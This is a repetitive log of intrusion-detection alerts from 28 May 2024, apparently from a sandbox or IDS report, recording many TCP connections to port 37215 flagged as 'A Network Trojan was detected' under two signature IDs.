                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.547325
                  SID:2835222
                  Source Port:40258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788290
                  SID:2835222
                  Source Port:33690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578626
                  SID:2829579
                  Source Port:58626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793660
                  SID:2829579
                  Source Port:35856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529696
                  SID:2835222
                  Source Port:42394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847427
                  SID:2829579
                  Source Port:34416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527887
                  SID:2829579
                  Source Port:54924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315920
                  SID:2835222
                  Source Port:46240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719236
                  SID:2829579
                  Source Port:38408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651466
                  SID:2835222
                  Source Port:41226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.857394
                  SID:2835222
                  Source Port:54764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.323122
                  SID:2829579
                  Source Port:35708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737525
                  SID:2829579
                  Source Port:56530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591146
                  SID:2829579
                  Source Port:58114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845224
                  SID:2829579
                  Source Port:51032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659915
                  SID:2829579
                  Source Port:55510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.889479
                  SID:2835222
                  Source Port:39066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.548199
                  SID:2829579
                  Source Port:58766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.786487
                  SID:2829579
                  Source Port:36744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555699
                  SID:2829579
                  Source Port:45204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.299026
                  SID:2829579
                  Source Port:49200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767708
                  SID:2829579
                  Source Port:46474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790207
                  SID:2829579
                  Source Port:57694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845717
                  SID:2829579
                  Source Port:39980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492193
                  SID:2829579
                  Source Port:39962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788860
                  SID:2835222
                  Source Port:46150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591122
                  SID:2829579
                  Source Port:51784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.550555
                  SID:2829579
                  Source Port:36832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651019
                  SID:2829579
                  Source Port:51084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742912
                  SID:2829579
                  Source Port:45414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629164
                  SID:2829579
                  Source Port:44524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.320177
                  SID:2829579
                  Source Port:45536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795647
                  SID:2835222
                  Source Port:42208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874017
                  SID:2829579
                  Source Port:59126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870541
                  SID:2829579
                  Source Port:57722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296150
                  SID:2829579
                  Source Port:57916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908522
                  SID:2829579
                  Source Port:44136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.770980
                  SID:2835222
                  Source Port:37294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887818
                  SID:2835222
                  Source Port:59510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.753898
                  SID:2829579
                  Source Port:39912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292690
                  SID:2835222
                  Source Port:44158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920798
                  SID:2829579
                  Source Port:45078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923060
                  SID:2829579
                  Source Port:33574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742672
                  SID:2835222
                  Source Port:57590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.925908
                  SID:2835222
                  Source Port:36066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908546
                  SID:2829579
                  Source Port:37904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.799590
                  SID:2835222
                  Source Port:41896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923902
                  SID:2835222
                  Source Port:55544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.497790
                  SID:2835222
                  Source Port:56448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527357
                  SID:2835222
                  Source Port:54786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768773
                  SID:2829579
                  Source Port:38516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.866388
                  SID:2829579
                  Source Port:53104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276214
                  SID:2835222
                  Source Port:47344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.882550
                  SID:2835222
                  Source Port:34670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292623
                  SID:2835222
                  Source Port:58932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545095
                  SID:2829579
                  Source Port:48962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629072
                  SID:2835222
                  Source Port:42586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.660776
                  SID:2829579
                  Source Port:48110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649401
                  SID:2829579
                  Source Port:45466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.588440
                  SID:2835222
                  Source Port:53538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.864791
                  SID:2835222
                  Source Port:33966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316646
                  SID:2829579
                  Source Port:38656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:12.604372
                  SID:2829579
                  Source Port:56106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316583
                  SID:2835222
                  Source Port:51834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628926
                  SID:2835222
                  Source Port:51198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886260
                  SID:2829579
                  Source Port:55852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.658972
                  SID:2835222
                  Source Port:34732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.794540
                  SID:2829579
                  Source Port:60184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799430
                  SID:2835222
                  Source Port:49078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.598250
                  SID:2829579
                  Source Port:38166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279337
                  SID:2835222
                  Source Port:45396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537163
                  SID:2835222
                  Source Port:35830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696633
                  SID:2835222
                  Source Port:52458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.323014
                  SID:2835222
                  Source Port:41630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849237
                  SID:2835222
                  Source Port:46170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788087
                  SID:2829579
                  Source Port:37502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886587
                  SID:2829579
                  Source Port:56196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300121
                  SID:2835222
                  Source Port:52390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.545450
                  SID:2835222
                  Source Port:42638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796877
                  SID:2835222
                  Source Port:37452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.889449
                  SID:2835222
                  Source Port:56918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.801665
                  SID:2835222
                  Source Port:47366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.859361
                  SID:2835222
                  Source Port:57970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594368
                  SID:2829579
                  Source Port:34848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488626
                  SID:2835222
                  Source Port:32804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911624
                  SID:2835222
                  Source Port:41182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651438
                  SID:2829579
                  Source Port:41506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276808
                  SID:2829579
                  Source Port:57776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651187
                  SID:2835222
                  Source Port:42344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650619
                  SID:2835222
                  Source Port:54304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.932584
                  SID:2835222
                  Source Port:46474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742310
                  SID:2835222
                  Source Port:55846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547551
                  SID:2835222
                  Source Port:41964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578910
                  SID:2835222
                  Source Port:56196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.662004
                  SID:2835222
                  Source Port:45440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.803934
                  SID:2835222
                  Source Port:60544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.787554
                  SID:2835222
                  Source Port:54076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789775
                  SID:2835222
                  Source Port:45570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.785596
                  SID:2835222
                  Source Port:40534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886658
                  SID:2835222
                  Source Port:53030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583534
                  SID:2835222
                  Source Port:45212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279351
                  SID:2829579
                  Source Port:51064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277634
                  SID:2829579
                  Source Port:43798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490032
                  SID:2829579
                  Source Port:33304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.900443
                  SID:2829579
                  Source Port:49254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628377
                  SID:2835222
                  Source Port:51826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.781194
                  SID:2835222
                  Source Port:38498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.872196
                  SID:2829579
                  Source Port:51782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493514
                  SID:2835222
                  Source Port:59970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.930654
                  SID:2835222
                  Source Port:43352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555183
                  SID:2829579
                  Source Port:38164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660578
                  SID:2835222
                  Source Port:60692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766466
                  SID:2829579
                  Source Port:58656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796574
                  SID:2829579
                  Source Port:58542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.880109
                  SID:2829579
                  Source Port:58362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931639
                  SID:2829579
                  Source Port:49986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912231
                  SID:2829579
                  Source Port:34930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.578711
                  SID:2835222
                  Source Port:46916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847832
                  SID:2835222
                  Source Port:47156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.868540
                  SID:2829579
                  Source Port:55638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790207
                  SID:2835222
                  Source Port:57694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.593090
                  SID:2829579
                  Source Port:47306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665349
                  SID:2829579
                  Source Port:54364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:23.801992
                  SID:2835222
                  Source Port:36718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796741
                  SID:2835222
                  Source Port:39586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906715
                  SID:2829579
                  Source Port:35674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790358
                  SID:2829579
                  Source Port:33446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912803
                  SID:2829579
                  Source Port:44678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651787
                  SID:2835222
                  Source Port:52884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649874
                  SID:2829579
                  Source Port:42596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906168
                  SID:2835222
                  Source Port:48188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695747
                  SID:2829579
                  Source Port:40508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536621
                  SID:2829579
                  Source Port:58414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527512
                  SID:2835222
                  Source Port:60820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.866468
                  SID:2835222
                  Source Port:57464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576902
                  SID:2829579
                  Source Port:33826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537024
                  SID:2835222
                  Source Port:47764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278210
                  SID:2835222
                  Source Port:56310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742310
                  SID:2829579
                  Source Port:50346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788290
                  SID:2829579
                  Source Port:33690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.794138
                  SID:2835222
                  Source Port:51412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277323
                  SID:2829579
                  Source Port:45216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651019
                  SID:2829579
                  Source Port:35242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298091
                  SID:2829579
                  Source Port:57896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530023
                  SID:2835222
                  Source Port:41098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661514
                  SID:2835222
                  Source Port:37456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.718833
                  SID:2829579
                  Source Port:60304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.601640
                  SID:2835222
                  Source Port:38410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755665
                  SID:2829579
                  Source Port:51706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627721
                  SID:2835222
                  Source Port:56656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.818077
                  SID:2835222
                  Source Port:47420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594462
                  SID:2829579
                  Source Port:36610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665346
                  SID:2829579
                  Source Port:40048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887264
                  SID:2835222
                  Source Port:56244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678814
                  SID:2835222
                  Source Port:41160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316299
                  SID:2835222
                  Source Port:43060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494685
                  SID:2829579
                  Source Port:33410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887871
                  SID:2829579
                  Source Port:43800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.323034
                  SID:2829579
                  Source Port:35206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537264
                  SID:2829579
                  Source Port:37340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542774
                  SID:2835222
                  Source Port:52066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296279
                  SID:2835222
                  Source Port:45362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695305
                  SID:2835222
                  Source Port:55672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490348
                  SID:2829579
                  Source Port:49302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766603
                  SID:2835222
                  Source Port:53228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316322
                  SID:2835222
                  Source Port:59996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578011
                  SID:2835222
                  Source Port:56178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.583725
                  SID:2829579
                  Source Port:60428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695427
                  SID:2829579
                  Source Port:39070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.587951
                  SID:2835222
                  Source Port:58378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660592
                  SID:2835222
                  Source Port:38094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719861
                  SID:2835222
                  Source Port:49220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766643
                  SID:2835222
                  Source Port:42652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488139
                  SID:2835222
                  Source Port:39770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651019
                  SID:2835222
                  Source Port:50450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798193
                  SID:2829579
                  Source Port:36972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737994
                  SID:2835222
                  Source Port:53974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.927380
                  SID:2829579
                  Source Port:54894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.660513
                  SID:2835222
                  Source Port:55202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661259
                  SID:2829579
                  Source Port:50482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665509
                  SID:2835222
                  Source Port:47082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490197
                  SID:2835222
                  Source Port:34718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.593965
                  SID:2835222
                  Source Port:50812
                  Destination Port:37215
